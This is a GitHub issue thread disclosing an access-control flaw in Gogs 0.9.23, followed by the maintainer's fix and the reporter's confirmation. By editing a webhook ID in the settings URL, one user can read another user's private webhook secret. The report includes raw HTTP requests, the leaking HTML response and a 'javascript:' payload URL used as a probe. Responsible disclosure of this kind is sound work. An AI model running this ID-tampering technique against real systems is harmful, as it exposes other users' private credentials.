### ISSUE TITLE
It is possible to get webhooks from arbitrary repositories

### ISSUE THREAD

**Issue by jimen0** [gogits/gogs#3057]
- Gogs version (or commit ref): 0.9.23.0426 
- Git version: latest (I suppose)
- Operating system: the one that [your demo page](https://try.gogs.io) uses
- Database: same as the OS answer
  - [ ] PostgreSQL
  - [ ] MySQL
  - [ ] SQLite
- Can you reproduce the bug at https://try.gogs.io:
  - [x] Yes (provide example URL) (see description)
  - [ ] No
  - [ ] Not relevant
- Log gist:

## Description
Due this is a possible vulnerability I'm reporting this showing the full requests and data.
I created 2 different users at your demo page:
- Attacker: username -> testApi12
- Victim: username -> testApi11

Now both users create a __private__ repository.
- Attacker creates [this one](https://try.gogs.io/testApi12/demo)
- Victim creates [this other one](https://try.gogs.io/testApi11/Prueba_1_bug)

Now the attacker creates a random webhook, mine was this one:
- URL: [click here](https://try.gogs.io/testApi12/demo/settings/hooks/62)
- Payload URL: `javascript:alert("https://google.com");`
- Content-Type: `application/json`
- Secret: `aaaaaaaaaaaa`

The webhook from victim (remember, his repository is __private__):
- URL: [click here](https://try.gogs.io/testApi11/Prueba_1_bug/settings/hooks/63)
- Payload URL: `https://example.com/?xxx=`
- Content-Type: `application/json`
- Secret: `thisTokenShouldBeSecretBecauseTheRepoIsPrivate`

So, now turn on a Proxy with the ability to intercept requests (**I used Burp**) and, from the attacker's account go to his webhook, the request will be something like this:

```
GET /testApi12/demo/settings/hooks/62 HTTP/1.1

Host: try.gogs.io
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: lang=en-US; i_like_gogits=11c61e4e16be768a; _csrf=0eulbTXsDmTnNzICF2np5Paqosw6MTQ2MjM3Mzg3NjYxOTg3NDg4Ng%3D%3D
Connection: close
```

The answer will show the webhook details, now... **if I modify the hook ID (62 in my example) for the one of the victim's private repository**, I will also get the details:
```
GET /testApi12/demo/settings/hooks/63 HTTP/1.1

Host: try.gogs.io
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: lang=en-US; i_like_gogits=11c61e4e16be768a; _csrf=0eulbTXsDmTnNzICF2np5Paqosw6MTQ2MjM3Mzg3NjYxOTg3NDg4Ng%3D%3D
Connection: close
```

I will obtain the full details (**including the secret**):
```
<label for="payload_url">Payload URL</label>
			<input id="payload_url" name="payload_url" type="url" value="https://example.com/?xxx=" autofocus required>
		</div>
		<div class="field">
			<label>Content Type</label>
			<div class="ui selection dropdown">
				<input type="hidden" id="content_type" name="content_type" value="1">
				<div class="default text"></div>
				<i class="dropdown icon"></i>
				<div class="menu">
					<div class="item" data-value="1">application/json</div>
					<div class="item" data-value="2">application/x-www-form-urlencoded</div>
				</div>
			</div>
		</div>
		<input class="fake" type="password">
		<div class="field ">
			<label for="secret">Secret</label>
			<input id="secret" name="secret" type="password" value="thisTokenShouldBeSecretBecauseTheRepoIsPrivate" autocomplete="off">
```

So, note that I got the private values.

Kind regards,
Miguel Ángel Jimeno

**Comment by Unknwon** [comment]
Patch has pushed to fix this issue, please test on `develop` branch or https://try.gogs.io.

**Comment by jimen0** [comment]
Hello, @Unknwon 

I've checked it again. Issue seems fixed for me. Nice work! :sunglasses:

Kind regards!
